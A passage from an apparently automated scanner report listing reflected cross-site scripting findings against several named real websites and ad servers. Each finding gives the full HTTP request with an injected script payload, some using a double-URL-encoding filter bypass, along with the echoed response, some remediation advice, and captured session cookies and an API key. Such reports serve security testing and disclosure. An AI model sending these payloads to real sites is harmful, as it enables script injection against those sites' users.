HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/e2a6e><img src=a onerror=alert(1)>39a70330b58.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 was submitted in the REST URL parameter 5. This input was echoed as 17276><img src=a onerror=alert(1)>abf137323f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5165
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/L500 Logo.gif17276><img src=a onerror=alert(1)>abf137323f7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b was submitted in the REST URL parameter 4. This input was echoed as b38f5\"><script>alert(1)</script>ed437b2915b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12483

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"><script>alert(1)</script>ed437b29
...[SNIP]...
<img src="pix/headers/Publications.jpg" alt="banner image - Publications1055:479b38f5\"><script>alert(1)</script>ed437b2915b" />
...[SNIP]...

3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 was submitted in the REST URL parameter 4. This input was echoed as 345e0--><script>alert(1)</script>f416c8577e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12502

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>f416c8577e
...[SNIP]...
<!-- contact box 1055 479345e0--><script>alert(1)</script>f416c8577e6 -->
...[SNIP]...

3.90. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf was submitted in the url parameter. This input was echoed as 25dc9<img src=a onerror=alert(1)>4460fcf0bcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:10 GMT
Content-Length: 155

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.readwriteweb.com\/enterprise\/2010\/11\/oracle.php25dc9<img src=a onerror=alert(1)>4460fcf0bcf"});

3.91. http://www.sapient.com/en-us/search.html [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/search.html

Issue detail

The value of the search request parameter is copied into the name of an HTML tag attribute. The payload 71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a was submitted in the search parameter. This input was echoed as 71cf5 style=x:expression(alert(1)) 041bb562a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en-us/search.html?search=xss%20contact%20faq%20phone71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.3.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; locale=en-us

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a title'Next' href=/en-us/search.html?search=xss contact faq phone71cf5 style=x:expression(alert(1)) 041bb562a4a&PageIndex=2>
...[SNIP]...

3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c9c69<script>alert(1)</script>856d1048244 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: c9c69<script>alert(1)</script>856d1048244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:18 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: c9c69<script>alert(1)</script>856d1048244

3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053a"-alert(1)-"60aad715d99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A5B13C6DD2625ADC8DB86B9CC1C99F3C; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000"
...[SNIP]...

3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685de"-alert(1)-"60e51d37b2a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=685de"-alert(1)-"60e51d37b2a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^260; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61369; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1300434.js^5^1315321030^1315321030&1295121.js^3^1315321030^1315321030&2553663.js^5^1315321026^1315321026&1295156.js^3^1315320939^1315321026&638177.js^2^1315313132^-1612641032; expires=Tue, 13-Sep-2011 14:57:10 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300434"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=685de"-alert(1)-"60e51d37b2a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dcb9"-alert(1)-"3db46c88d9f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=1dcb9"-alert(1)-"3db46c88d9f; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:46 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^231c9a%00%0d%0a98f953b2934&11953^5; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61333; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1300433.js^18^1315321062^1315321066&1295118.js^3^1315321062^1315321062&2553662.js^5^1315321061^1315321061&1295153.js^3^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^-1612640932; expires=Tue, 13-Sep-2011 14:57:46 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300433"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1dcb9"-alert(1)-"3db46c88d9f\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67a75"><script>alert(1)</script>5b71f4343a7 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=67a75"><script>alert(1)</script>5b71f4343a7; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^744f40729e51a8caac2210640; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1785

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67a75"><script>alert(1)</script>5b71f4343a7" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e19"-alert(1)-"aad8da393bf was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=f1e19"-alert(1)-"aad8da393bf; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

